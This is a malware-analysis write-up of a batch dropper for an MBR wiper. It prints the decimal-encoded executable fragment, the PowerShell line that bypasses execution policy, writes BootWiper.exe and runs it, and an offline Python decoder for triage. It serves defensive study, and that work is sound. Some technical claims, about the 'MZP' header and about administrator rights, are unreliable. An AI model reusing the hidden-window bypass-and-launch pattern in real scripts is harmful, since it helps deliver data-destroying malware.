Analysis of a Malicious Batch Script
Batch scripts, like PowerShell, can be used for malicious purposes, whether to download the second stage of a malware infection or to wipe the entire system. In this article we will discuss how to analyze a malicious batch script that runs an executable file without using any external mechanism such as downloading from the cloud to the computer: the executable is embedded inside the script as decimal values, and when the script runs it first decodes itself and then launches the result. As a general point, running malware through any dropper script of this kind requires administrator permission.
Sample : https://bazaar.abuse.ch/sample/6501a5b432c8ff0d740520ef039d89b3ba6bcd3d991ff48fdf240f509d1e471e/
Note: the suffixes .cmd, .bat, and .batch still fall into the batch script class and template.
Malicious Code [Code Analysis]:
@echo off
title Batch MBR Overwrite
color 4f
echo Run MBR Wiper? (make sure you run it as Administrator)
pause
echo|set /p=>456.hex
An important line in the script is: echo|set /p=>456.hex . Here the developer of this malicious script creates an empty file called 456.hex, and from this file and what is written into it we can be sure that the code containing the executable file is encoded in decimal.
Then comes the next line of code:
echo|set /p=77 90 80 0 2 0 0 0 4 0 15 0 255 255 0 0 184 0 0 0 0 0 0 64 0 26 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 186 16 0 14 31 180 9 205 33 184 1 76 205 33 144 144 84 104 105 115 32 112 114 111 103 114 97 109 32 109 117 115 116 32 98 101 32 114 117 110 32 117 110 100 101 114 32 87 105 110 51 50 13 10 36 55 0 0 0 0 0 0 0 0 >>456.hex
Here we see that these decimal values are appended (>>) to the empty file 456.hex that the script created earlier.
To make sure that this is really an executable file, we can check it with CyberChef, as shown in the picture below. I have copied the decimal values that the developer of this malicious program piped into 456.hex:
In the figure, we see that after decoding the decimal values the first thing that appears is a header called MZP. MZP is a file format; it is the native format for WinArchiver. It also contains an executable file that the developer of the malicious program may have developed or downloaded from elsewhere and used for this process. What further assures us that it contains an executable file is the string "This program must be run under Win32". If you pay attention and have previous experience, most executable programs, especially those designed for Windows, will show a string in a hex editor that says "This program cannot be run in DOS mode". This serves as a signature identifying the program as an executable file. At the end of the malicious batch script, we see that the developer of this malware relies on PowerShell to run the executable file that was encoded in decimal.
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -Command "[string]$hex = get-content -path 456.hex;[Byte[]] $temp = $hex -split '". ';[System.IO.File]::WriteAllBytes('BootWiper.exe', $temp)"
start BootWiper.exe
Here the developer of this script and malicious program performs several tasks and processes:
1. Bypass the ExecutionPolicy
2. -Command "[string]$hex = get-content -path 456.hex
3. [System.IO.File]::WriteAllBytes
4. Start BootWiper.exe
What is important for us to focus on is not start BootWiper.exe but [System.IO.File]::WriteAllBytes, because here all the bytes and values of the executable file that was encoded in decimal are written to a file called BootWiper.exe, which is then started. The system on the computer will then black out: either the boot record is modified and a fee is demanded in exchange for unlocking your computer, or no money is asked for and, after a few hours or minutes, the system is completely deleted, in which case the infected person must reinstall the system from scratch.
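As an added example that is not part of the original post or the malware sample, the Python script below reproduces the decoding step of the PowerShell stage offline, so an analyst can recover and triage the embedded file without ever running the dropper: it collects the decimal byte lists appended to 456.hex, rebuilds the bytes the same way $hex -split does, and checks for the MZ magic (bytes 77 90) and the DOS-stub string. The batch text is a constructed fragment built from the bytes quoted above, and the regex assumes the exact echo|set /p=... >>file form used in this sample.

```python
import re

# Constructed sample modelled on the dropper above: the bytes are the decimal
# fragment quoted in the article, split over two append lines as a dropper would.
SAMPLE_BAT = (
    "@echo off\r\n"
    "title Batch MBR Overwrite\r\n"
    "echo|set /p=>456.hex\r\n"
    "echo|set /p=77 90 80 0 2 0 0 0 4 0 15 0 255 255 0 0 184 0 0 0 >>456.hex\r\n"
    "echo|set /p=84 104 105 115 32 112 114 111 103 114 97 109 32 109 117 115 116 "
    "32 98 101 32 114 117 110 32 117 110 100 101 114 32 87 105 110 51 50 13 10 36 55 >>456.hex\r\n"
)

# One 'echo|set /p=<decimal list> >>file' line. The empty-file line has no digits
# after '=' and is deliberately not matched (assumed pattern for this family).
APPEND_RE = re.compile(r"^echo\|set /p=((?:\d{1,3}\s+)*\d{1,3})\s*>>\s*(\S+)", re.M)

DOS_STUB_STRINGS = (b"This program must be run under Win32",
                    b"This program cannot be run in DOS mode")

def extract_decimal_payloads(bat_text):
    """Rebuild {target_file: bytes} the same way the PowerShell stage does:
    split on whitespace, cast each token to a byte, keep append order."""
    payloads = {}
    for m in APPEND_RE.finditer(bat_text):
        values = [int(v) for v in m.group(1).split()]
        if max(values) > 255:
            continue          # not a byte list; skip rather than mis-decode
        payloads.setdefault(m.group(2), bytearray()).extend(values)
    return {name: bytes(buf) for name, buf in payloads.items()}

def triage(data):
    """Static indicators a reviewer checks before anything is executed."""
    return {
        "size": len(data),
        "mz_header": data[:2] == b"MZ",          # 77 90 = DOS/PE header magic
        "magic": data[:3].decode("ascii", "replace"),
        "dos_stub": next((s.decode() for s in DOS_STUB_STRINGS if s in data), None),
    }

if __name__ == "__main__":
    for name, blob in extract_decimal_payloads(SAMPLE_BAT).items():
        print(name, triage(blob))
```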